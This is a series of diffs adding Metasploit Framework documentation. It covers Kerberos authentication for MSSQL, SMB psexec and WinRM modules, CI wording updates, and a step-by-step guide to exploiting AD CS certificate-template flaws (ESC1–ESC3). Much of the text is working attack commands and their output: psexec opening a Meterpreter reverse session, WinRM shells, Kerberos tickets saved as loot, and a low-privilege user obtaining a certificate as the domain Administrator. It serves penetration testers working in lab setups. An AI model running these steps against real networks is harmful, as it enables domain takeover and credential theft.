+[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
+[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] Discovering base DN automatically
+[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
+CN=Administrator CN=Users DC=domain DC=local
+==========================================
+
+ Name                Attributes
+ ----                ----------
+ badpwdcount         0
+ pwdlastset          133184302034979121
+ samaccountname      Administrator
+ useraccountcontrol  512
+ ... etc ...
+```
@@ -0,0 +1,61 @@
+## MSSQL Workflows
+
+Microsoft SQL Server (MSSQL) is a relational database management system. Commonly used in conjunction with web applications
+and other software that need to persist data. MSSQL is a useful target for data extraction and code execution.
+
+MySQL is frequently found on port on the following ports:
+
+- 1433/TCP
+- 1434/UDP
+
+### Lab Environment
+
+Environment setup:
+
+- Either follow [Microsoft's SQL Server installation guide](https://learn.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver16) or use chocolatey package manager 
+- Enable TCP access within the SQL Server Configuration Manager
+- Optional: [Microsoft's sqlcmd utility](https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver16) can be installed separately for querying the database from your host machine
+- Optional: [Configure Windows firewall](https://learn.microsoft.com/en-us/sql/sql-server/install/configure-the-windows-firewall-to-allow-sql-server-access?view=sql-server-ver16) to allow MSSQL server access 
+
+### MSSQL Enumeration
+
+### Running queries
+
+```
+use auxiliary/admin/mssql/mssql_sql
+run rhost=192.168.123.13 username=administrator password=p4$$w0rd sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+```
+
+### Link crawling
+
+Identify if the SQL server has been configured with trusted links, which allows running queries on other MSSQL instances:
+
+```
+use windows/mssql/mssql_linkcrawler
+run rhost=192.168.123.13 username=administrator password=p4$$w0rd
+```
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Connect to a Microsoft SQL Server instance and run a query:
+
+```
+msf6 > use auxiliary/admin/mssql/mssql_sql
+msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+[*] Reloading module...
+[*] Running module against 192.168.123.13
+
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response
+[+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
+[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
+[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)
+
+ auth_scheme
+ -----------
+ KERBEROS
+
+[*] Auxiliary module execution completed
+```
@@ -185,3 +185,30 @@ use auxiliary/admin/smb/upload_file
 echo "my file" > local_file.txt
 run smb://a:p4$$w0rd@192.168.123.13/my_share/remote_file.txt lpath=./local_file.txt
 ```
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Running psexec against a host:
+
+```
+msf6 > use exploit/windows/smb/psexec
+msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.13:445 - Connecting to the server...
+[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] 192.168.123.13:445 - Selecting PowerShell target
+[*] 192.168.123.13:445 - Executing the payload...
+[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.123.13
+[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000
+
+meterpreter >
+```
@@ -7,6 +7,11 @@ There are two main ports for WinRM:
 - 5985/TCP - HTTP
 - 5986/TCP - HTTPS

+On older versions of Windows such as Windows 7/Windows Server 2008 the following ports were used:
+
+- 80/TCP - HTTP
+- 443/TCP - HTTPS
+
 Important: Before running the chosen WinRM Metasploit module, first ensure that the `RPORT` and `SSL` values are configured correctly.
 Either with the modern inline option support:

@@ -133,3 +138,32 @@ Microsoft Windows [Version 10.0.14393]

 C:\Users\user>
 ```
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Open a WinRM session:
+
+```
+msf6 > use auxiliary/scanner/winrm/winrm_login
+msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd win::rmauth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
+
+[+] 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
+[+] 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:5985   - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin
+[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
+[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
+[+] 192.168.123.13:5985 - Login Successful: demo.local\Administrator:p4$$w0rd
+[*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
+[*] Starting interaction with 1...
+
+Microsoft Windows [Version 10.0.14393]
+(c) 2016 Microsoft Corporation. All rights reserved.
+
+C:\Users\Administrator>
+```
@@ -196,8 +196,8 @@ Related open tickets (slightly broader than Meterpreter):

 ### Unit testing for payloads
 * Metasploit payload classes should have specs, new specs should be created when any class is changed if there isn't an existing spec.
- * Metasploit payload tests that can run in Travis, should be automatically tested end-to-end
- * Metasploit payload tests that can't run in Travis should be run by Jenkins and target a virtual machine (local or cloud-hosted).
+ * Metasploit payload tests that can run in Github Actions, should be automatically tested end-to-end
+ * Metasploit payload tests that can't run in GitHub Actions should be run by Jenkins and target a virtual machine (local or cloud-hosted).
 * Meterpreter payloads should test every advertised console command.
 * Meterpreter payloads should test a subset of the full APIs available.

@@ -2,10 +2,13 @@ Since the Metasploit-framework repository's master branch is the bleeding edge o

 # What's a bad merge?

- * Anything that causes [Travis-CI](https://travis-ci.org/rapid7/metasploit-framework/builds) to fail rspec tests consistently.
+ * Anything that causes our GitHub Actions to fail consistently.
 * Anything that hits untested code that otherwise causes problems with `msfconsole`, `msfcli`, `msfvenom`, and other console commands.

-Sometimes, Travis-CI does choke up, due to network weather. Every build is a fresh clone, and all gems have to be reinstalled every time. Also, some rspec tests require network connections to assets on the Internet. Sometimes, Travis-CI itself is under a lot of load, and builds time out.
+Sometimes, GitHub Actions might choke up, due to network weather. Every build is a fresh
+clone, and all gems have to be reinstalled every time. Also, some rspec tests require
+network connections to assets on the Internet. Sometimes, GitHub Actions servers are under a lot of
+load, and builds time out.

 The best way to diagnose these problems is simply to restart the build. Note, only [Committers](https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights) have rights to do this. If that doesn't clear things up, or if it's obvious that there are real failures (since you've read the rspec results and have read the tests), the first order of business is to undo your bad commit.

@@ -15,10 +18,6 @@ The best way to diagnose these problems is simply to restart the build. Note, on

 Once, there was a bad merge on [PR #2320](https://github.com/rapid7/metasploit-framework/pull/2320). The fellow landing this pull request ran into a merge conflict while landing, thought he fixed it, and pushed the results, which ended up breaking about a dozen Rspec tests. Whoops. That was a bad merge. [PR #2624](https://github.com/rapid7/metasploit-framework/pull/2624) fixed it. Here's the procedure used.

-### Figure out what broke things.
-
-In this case, the failed build was pretty obvious: [Build #5216](https://travis-ci.org/rapid7/metasploit-framework/builds/13816889) was red, and rerunning Travis-CI didn't solve. Reading the build log, we can see this was [merge commit 3996557](http://github.com/rapid7/metasploit-framework/commit/3996557ec61a6eeefaa3448480012205b8825374).
-
 ### Check out the bad merge tip.

 These commands will put the local repo back to the bad merge, and create a local branch as such:
@@ -0,0 +1,758 @@
+# Setting Up An AD CS Target
+Follow the instructions [[here|./ad-certificates/overview.md]] to set up an AD CS server
+for testing purposes.
+
+## Introduction to AD CS Vulnerabilities
+```mermaid
+flowchart TD
+	escexp[Find vulnerable certificate templates\nvia ldap_esc_vulnerable_cert_finder] --> icpr[Issue certificates via icpr_cert]
+	icpr[Issue certificates via icpr_cert] --> ESC1{{ESC1}}
+	ESC1{{ESC1}} -- Via PKINIT --> pkinit{Authenticate to Kerberos}
+	icpr[Issue certificates via icpr_cert] --> users[Request certificates on behalf of other users]
+	users[Request certificates on behalf of other users] --> ESC2{{ESC2}}
+	users[Request certificates on behalf of other users] --> ESC3{{ESC3}}
+	ESC2{{ESC2}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
+	ESC3{{ESC3}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
+```
+
+The chart above showcases how one can go about attacking three common AD CS
+vulnerabilities, taking advantage of various flaws in how certificate templates are
+configured on an Active Directory Certificate Server.
+
+The following sections will walk through each of these steps, starting with enumerating
+certificate templates that the server has to offer and identifying those that are
+vulnerable to various misconfigurations and security flaws, followed by creating new
+certificates using these certificate templates with the `icpr_cert` Metasploit module,
+and finally using these certificates to authenticate to the domain as the domain
+administrator via Kerberos.
+
+Each certificate template vulnerability that will be discussed here has a ESC code, such
+as ESC1, ESC2, or ESC3. These ESC codes are taken from the original whitepaper that
+SpecterOps published which popularized these certificate template attacks, known as
+[Certified
+Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf).
+In this paper Will Schroeder and Lee Christensen described 8 different domain escalation
+attacks that they found they could conduct via misconfigured certificate templates:
+
+- ESC1 - Domain escalation via No Issuance Requirements + Enrollable Client
+  Authentication/Smart Card Logon OID templates + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+- ESC2 - Domain escalation via No Issuance Requirements + Enrollable Any Purpose
+  EKU or no EKU
+- ESC3 - Domain escalation via No Issuance Requirements + Certificate Request
+  Agent EKU + no enrollment agent restrictions
+- ESC4 - Domain escalation via misconfigured certificate template access control
+- ESC5 - Domain escalation via vulnerable PKI AD Object Access Control
+- ESC6 - Domain escalation via the EDITF_ATTRIBUTESUBJECTALTNAME2 setting on CAs + No
+  Manager Approval + Enrollable Client Authentication/Smart Card Logon OID templates
+- ESC7 - Vulnerable Certificate Authority Access Control
+- ESC8 - NTLM Relay to AD CS HTTP Endpoints
+
+Later, another
+[blog](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+came out from Oliver Lyak which discovered ESC9 and ESC10, two more vulnerabilities that
+could allow normal domain joined users to abuse certificate template misconfigurations to
+gain domain administrator privileges.
+
+- ESC9 - No Security Extension - CT_FLAG_NO_SECURITY_EXTENSION flag set in
+  `msPKI-EnrollmentFlag`. Also `StrongCertificateBindingEnforcement` not set to 2 or
+  `CertificateMappingMethods` contains `UPN` flag.
+- ESC10 - Weak Certificate Mappings -
+  `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
+  CertificateMappingMethods` contains `UPN` bit aka `0x4` or
+  `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc StrongCertificateBindingEnforcement` is set to `0`.
+
+Finally, we have ESC11, which was discovered by Compass Security and described in their
+[blog
+post](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/).
+
+- ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC
+  interface is allowed due to lack of the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.
+
+Currently Metasploit only supports attacking ESC1 to ESC3. As such,
+this paper only covers exploiting ESC1 to ESC3 at this time.
+
+Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
+as the diagram notes above. This is because in ESC1, one has control over the
+`subjectAltName` field in the generated certificate, which is also known as the `SAN`
+field. This field allows one to specify who the certificate should authenticate as.
+Therefore, all an attacker needs to do is simply modify this field and they can gain a
+certificate that allows them to authenticate as any user they wish.
+
+ESC2 is similar to ESC1 in all respects, however it differs in one key area. This is
+because, unlike ESC1 vulnerable certificate templates, you cannot edit the
+`subjectAltName` field, of ESC2 vulnerable certificate templates. Additionally, ESC2
+certificate templates define the `Any Purpose` extended key usage (EKU) or no EKU at all.
+This last part is important as it allows an attacker to utilize the ESC2 vulnerable
+certificate template to create a new certificate that can be used to authorize to log into
+a domain via Kerberos on behalf of any other user, thereby granting them access to the
+domain as that user. Note that certificates with no EKU at all will need to be trusted
+by the `NTAuthCertificates` object (which it won't be by default), otherwise new
+certificates that are created using the vulnerable ESC2 certificate template
+will not work for domain authentication. This restriction does not apply for those
+certificates vulnerable to ESC2 which have the `Any Purpose` EKU applied to them.
+
+Finally, ESC3 is fairly similar to ESC2, however it differs in two ways: a different EKU
+is abused, and the attacker also needs to utilize two different misconfigured certificate
+templates in order to exploit the vulnerability. The EKU in question this time is the
+Certificate Request Agent EKU, aka OID 1.3.6.1.4.1.311.20.2.1, which allows one to enroll
+for a certificate on behalf of another user, which may seem unusual, but this a common
+scenario within Microsoft environments. To abuse this EKU, an attacker must have the
+following two vulnerable certificate templates:
+
+1. A certificate template which has all the same permissions as ESC1, however it also has
+   the Certificate Request Agent EKU set on it, aka OID 1.3.6.1.4.1.311.20.2.1. This
+   certificate template is labeled as `ESC3_TEMPLATE_1` within the output of the
+   `ldap_esc_vulnerable_cert_finder` module we will use later on.
+2. A certificate template that allows low privileged users to enroll in it, and has
+   manager approval disabled, same as ESC1. However it also has either:
+   - A template schema of 1
+   - A template schema of 2 or greater and an Application Policy Issuance Requirement
+     requiring the Certificate Request Agent EKU so that only those who have a certificate
+     with this requirement can enroll in them.
+   It must also define an EKU that allows for domain authentication, same as ESC1, and
+   there must be no enrollment restrictions on the Certificate Authority (CA) server in
+   question. This certificate template is labeled as `ESC3_TEMPLATE_2` within the
+   output of the `ldap_esc_vulnerable_cert_finder` module we will use later on.
+
+If both of these criteria are met then the attacker can enroll in one of the
+`ESC3_TEMPLATE_1` vulnerable certificate templates as a low privileged user in order to
+get a certificate that will grant them Certificate Request Agent permissions. They can
+then use these permissions to enroll in a `ESC3_TEMPLATE_2` vulnerable certificate
+template and request a certificate on behalf of another user, such as the domain
+administrator, and utilize the fact that the certificate template allows for domain
+authentication to log into the domain via Kerberos as that user.
+
+## Finding Vulnerable ESC Templates Using ldap_esc_vulnerable_cert_finder
+Before one can exploit vulnerable ESC templates to elevate privileges, it is necessary to first find a list of vulnerable templates that exist on a domain.
+To do this we can run the `auxiliary/gather/ldap_esc_vulnerable_cert_finder` module. This module will connect to the LDAP server on a target
+Domain Controller (DC), and will run a set of LDAP queries to gather a list of certificate authority (CA) servers and the vulnerable certificate
+templates they make available for enrollment. It will then also query the permissions on both the CA and the certificate template to figure out
+which users or groups can use that certificate template to elevate their privileges.
+
+Keep in mind though that there are two sets of permissions in play here though. There is one set of permissions on the CA server that control
+who is able to enroll in any certificate template from that server, and second set of permissions that control who is allowed to enroll in
+a specific certificate template, which is applied to the certificate template itself. Therefore, the module will also specify which users are
+allowed to enroll in a specific template on a specific CA server, in order to make it as clear as possible which users or groups one needs
+to have access to in order to exploit the vulnerable certificate template.
+
+The following diagram showcases how this permissions check works in a more visual manner:
+
+```mermaid
+flowchart TD
+    user[User] --> firstcheck{CA Server Allows Enrollment?}
+	firstcheck{CA Server Allows Enrollment?} -- YES --> secondcheck{Certificate Template Allows Enrollment?}
+	firstcheck{CA Server Allows Enrollment?} -- NO --> denied[Access Denied]
+	secondcheck{Certificate Template Allows Enrollment?} -- NO --> denied[Access Denied]
+	secondcheck{Certificate Template Allows Enrollment?} -- YES --> success[Access Granted!]
+```
+
+To run the module, you will need to have the login credentials of a domain joined user. The specific permissions of this user should not matter though,
+since most LDAP servers in an Active Directory (AD) environment are configured in such a way that they allow users to read most objects, but not write to them.
+For our purposes, since we just need to read the details of the certificate templates that are available, this means normal user permissions should be sufficient.
+
+To run the module, specify the login credentials for an AD user, and set `RHOSTS` to the address of one of the Domain Controller (DC) IP addresses, then enter `run`.
+This will cause the module to log into the LDAP server on the target DC, and list out the vulnerable certificate templates and which CA servers they are available from,
+as well as the permissions that are required to enroll in these certificate templates. The following is a sample output of running this against a test server:
+
+```
+msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
+
+Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
+
+   Name                  Current Setting  Required  Description
+   ----                  ---------------  --------  -----------
+   BASE_DN                                no        LDAP base DN if you already have it
+   DOMAIN                                 no        The domain to authenticate to
+   PASSWORD                               no        The password to authenticate with
+   REPORT_NONENROLLABLE  false            yes       Report nonenrollable certificate templates
+   RHOSTS                                 yes       The target host(s), see https://github.com/rapid7/metasploit
+                                                    -framework/wiki/Using-Metasploit
+   RPORT                 389              yes       The target port
+   SSL                   false            no        Enable SSL on the LDAP connection
+   USERNAME                               no        The username to authenticate with
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set DOMAIN DAFOREST
+DOMAIN => DAFOREST
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set USERNAME normal
+USERNAME => normal
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set PASSWORD normaluser
+PASSWORD => normaluser
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+[*] Running module against 172.30.239.85
+
+[*] Discovering base DN automatically
+[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
+[*] Template: SubCA
+[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC1-Template
+[*]    Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC2-Template
+[*]    Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC3-Template1
+[*]    Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: User
+[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: Administrator
+[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: Machine
+[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: DomainController
+[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-498 (Enterprise Read-only Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-516 (Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]       * S-1-5-9 (Enterprise Domain Controllers)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC3-Template2
+[*]    Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
+```
+
+From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However, whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate tempalte. At that point you probably don't need to elevate your privileges any higher, so this certificate template isn't that useful for us.
+
+Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their privileges.
+
+Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack. ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but vulnerable to ESC3_TEMPLATE_2 attacks.
+
+We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack.
+
+Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and who's issuing CA allows any authenticated user to request it.
+
+With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the `ipcr_cert` module to request certificates for authentication using the vulnerable certificate templates.
+
+## Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
+Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can. Luckly we can also do this with the `icpr_cert` module. We just need to also set the `ALT_UPN` option to specify who we would like to authenticate as instead. Note that this only works with ESC1 vulnerable certificate templates which is why we can do this here.
+
+If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can quickly set this up:
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+CA => daforest-WIN-BR0CCBA815B-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Template
+CERT_TEMPLATE => ESC1-Template
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
+SMBDomain => DAFOREST
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
+SMBPass => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
+SMBUser => normal
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
+ALT_UPN => Administrator@daforest.com
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
+[*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216143830_default_unknown_windows.ad.cs_338144.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
+domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
+
+# Exploiting ESC2 To Gain Domain Administrator Privileges
+From the previous enumeration efforts we know that the following certificate templates are vulnerable to ESC2:
+- SubCA - Not exploitable as you have to be a Domain Admin or Enterprise Admin to enroll in this certificate
+- ESC2-Template - Enrollable by any authenticated user that is part of the Domain Users group, aka any authenticated domain user.
+
+We will use ESC2-Template to gain a TGT as the domain administrator user.
+
